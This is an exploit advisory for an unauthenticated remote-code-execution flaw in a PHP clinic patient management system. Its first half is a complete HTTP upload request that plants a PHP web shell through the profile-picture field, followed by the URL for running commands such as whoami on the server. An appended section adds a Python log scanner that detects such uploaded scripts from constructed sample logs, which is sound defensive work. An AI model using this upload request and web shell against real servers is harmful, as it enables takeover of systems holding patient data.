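# Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
# Date: 07.10.2023
# Exploit Author: Oğulcan Hami Gül
# Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-management-System-Source-Code-code
# Software Link: https://www.sourcecodester.com/down...le=clinic'S+Patient+Patient+Management+Symage
# Version: 1.0
# Tested on: Windows 10

## Unauthenticated users can access the /pms/users.php address and, without any authentication, upload a malicious PHP file in place of a profile picture image.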

POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
Content-Length: 1054
Origin: http://192.168.1.36
Connection: close
Referer: http://192.168.1.36/pms/users.php
Upgrade-Insecure-Requests: 1

-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="display_name"

SEFA7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="user_name"

SEFA7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="password"

SEFA7
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
Content-Type: application/x-php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------421755697017784551042596452367
Content-Disposition: form-data; name="save_user"


-----------------------------421755697017784551042596452367--

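## After the file upload request sent by the attacker, the application adds a random number to the beginning of the name of the file to be uploaded. The malicious file can be seen under the path /pms/users.php without any authentication.

## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary commands on the application server.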
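
A defender-side check for the behaviour described above, added here as an example and not part of the original advisory: it scans web-server access logs for requests to script files under the upload directory /pms/user_images/ and reports who requested them and with what result. The log lines are constructed samples; the Combined Log Format, the extension list, and reading the 10-digit filename prefix as a Unix timestamp (based only on the single example value on this page) are assumptions.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, unquote

UPLOAD_DIR = "/pms/user_images/"  # upload directory named in the advisory
# Assumption: extensions a typical Apache/PHP setup hands to the interpreter.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
# Assumption: Apache/nginx Combined Log Format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
PREFIX = re.compile(r"^(\d{10})")  # assumption: the prefix is a Unix timestamp

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Oct/2023:11:09:00 +0000] "POST /pms/users.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [07/Oct/2023:11:09:30 +0000] "GET /pms/user_images/1696676940simple-backdoor.php?cmd=whoami HTTP/1.1" 200 31',
    '198.51.100.7 - - [07/Oct/2023:11:12:02 +0000] "GET /pms/user_images/1696676000avatar.png HTTP/1.1" 200 20480',
    '198.51.100.7 - - [07/Oct/2023:11:13:40 +0000] "GET /pms/user_images/1696677200photo.PHP. HTTP/1.1" 404 196',
]

def find_upload_dir_script_hits(lines):
    """Return one finding per request for a script file inside the upload directory."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        parts = urlsplit(m["target"])
        path = unquote(parts.path)  # decode %2e-style obfuscation before matching
        if not path.lower().startswith(UPLOAD_DIR):
            continue
        # Windows (the tested platform) ignores trailing dots and spaces in file names.
        name = path[len(UPLOAD_DIR):].rstrip(". ")
        if not SCRIPT_EXT.search(name):
            continue  # ordinary image request
        p = PREFIX.match(name)
        uploaded = datetime.fromtimestamp(int(p[1]), tz=timezone.utc).isoformat() if p else None
        findings.append({
            "ip": m["ip"], "file": name, "status": int(m["status"]),
            "served_ok": m["status"] == "200",   # script existed and returned a response
            "has_query": bool(parts.query),      # parameters passed to an uploaded script
            "uploaded_utc": uploaded,            # upload time, if the assumption holds
        })
    return findings

if __name__ == "__main__":
    for hit in find_upload_dir_script_hits(SAMPLE_LOG):
        print(hit)
```

Any hit is worth triage, since a directory meant for profile pictures should never serve script files; a hit with `served_ok` and `has_query` both true is the highest priority.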